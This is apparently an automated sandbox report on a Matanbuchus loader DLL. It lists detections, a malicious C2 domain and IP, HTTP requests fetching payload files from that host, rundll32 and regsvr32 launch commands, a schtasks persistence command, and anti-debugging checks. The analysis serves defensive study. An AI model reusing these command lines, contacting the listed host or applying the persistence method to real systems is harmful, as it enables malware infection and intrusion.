Source: smphost.dll |
Virustotal: Detection: 8% |
Perma Link |
Source: http://manageintel.com/WUzZRUBQje/Auth.php |
Avira URL Cloud: Label: malware |
Source: smphost.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2 |
Source: smphost.dll |
Static PE information: certificate valid |
Source: |
Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EED8A FindFirstFileExW, |
2_2_6E9EED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84ED8A FindFirstFileExW, |
38_2_6F84ED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 185.14.31.158 32710 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: manageintel.com |
|
Source: unknown |
Network traffic detected: HTTP traffic on port 49762 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49762 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49843 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49843 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49844 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49844 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49845 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49845 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49846 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49846 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49847 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49847 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49848 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49848 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49849 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49849 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49850 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49850 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49851 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49851 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49852 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49852 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49853 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49853 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49854 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49854 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49855 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49855 |
Source: Joe Sandbox View |
ASN Name: ITLDC-NLUA ITLDC-NLUA |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle, |
2_2_6E9E8210 |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache |
Source: global traffic |
TCP traffic: 192.168.2.3:49762 -> 185.14.31.158:32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49841 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49764 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49841 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49840 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49761 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49760 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49840 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49761 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49760 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49764 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49759 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49759 -> 443 |
Source: regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://manageintel.com/ |
Source: regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml |
Source: regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml |
Source: unknown |
HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 549 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US |
Source: unknown |
DNS traffic detected: queries for: manageintel.com |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9F3EB6 |
2_2_6E9F3EB6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8C90 |
2_2_6E9E8C90 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F853EB6 |
38_2_6F853EB6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F848C90 |
38_2_6F848C90 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: String function: 6E9E9960 appears 34 times |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: String function: 6F849960 appears 34 times |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Section loaded: sfc.dll |
Source: C:\Windows\System32\regsvr32.exe |
Section loaded: sfc.dll |
Source: smphost.dll |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll32.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: unknown |
Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Source: C:\Windows\SysWOW64\WerFault.exe |
File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA1.tmp |
Source: classification engine |
Classification label: mal88.troj.evad.winDLL@22/7@16/2 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, |
2_2_6E9E8630 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Mutant created: \Sessions\1\BaseNamedObjects\computer |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3576 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\SysWOW64\WerFault.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File created: C:\ProgramData\6\5507.ocx |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 |
Thread sleep time: -330000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information queried: ProcessInformation |
Source: C:\Windows\System32\loaddll32.exe |
Thread delayed: delay time: 120000 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Thread delayed: delay time: 30000 |
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG |
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: eCATR3i7EpbaN9iNfeSlpa+LReiKwHVl5h2XxKhGfSRSHDvGdRfoP4L+/8cPCQAA |
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW, |
2_2_6E9E9CF7 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EFE17 GetProcessHeap, |
2_2_6E9EFE17 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E1710 mov eax, dword ptr fs:[00000030h] |
2_2_6E9E1710 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E1490 mov eax, dword ptr fs:[00000030h] |
2_2_6E9E1490 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E83B0 mov eax, dword ptr fs:[00000030h] |
2_2_6E9E83B0 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EC865 mov eax, dword ptr fs:[00000030h] |
2_2_6E9EC865 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h] |
2_2_6E9EE9B4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F841710 mov eax, dword ptr fs:[00000030h] |
38_2_6F841710 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F841490 mov eax, dword ptr fs:[00000030h] |
38_2_6F841490 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F8483B0 mov eax, dword ptr fs:[00000030h] |
38_2_6F8483B0 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84E9B4 mov eax, dword ptr fs:[00000030h] |
38_2_6F84E9B4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84C865 mov eax, dword ptr fs:[00000030h] |
38_2_6F84C865 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process queried: DebugPort |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
2_2_6E9E9AED |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_6E9EC0A3 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_6E9E9839 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F849AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
38_2_6F849AED |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84C0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
38_2_6F84C0A3 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F849839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
38_2_6F849839 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9658 cpuid |
2_2_6E9E9658 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
2_2_6E9E99A8 |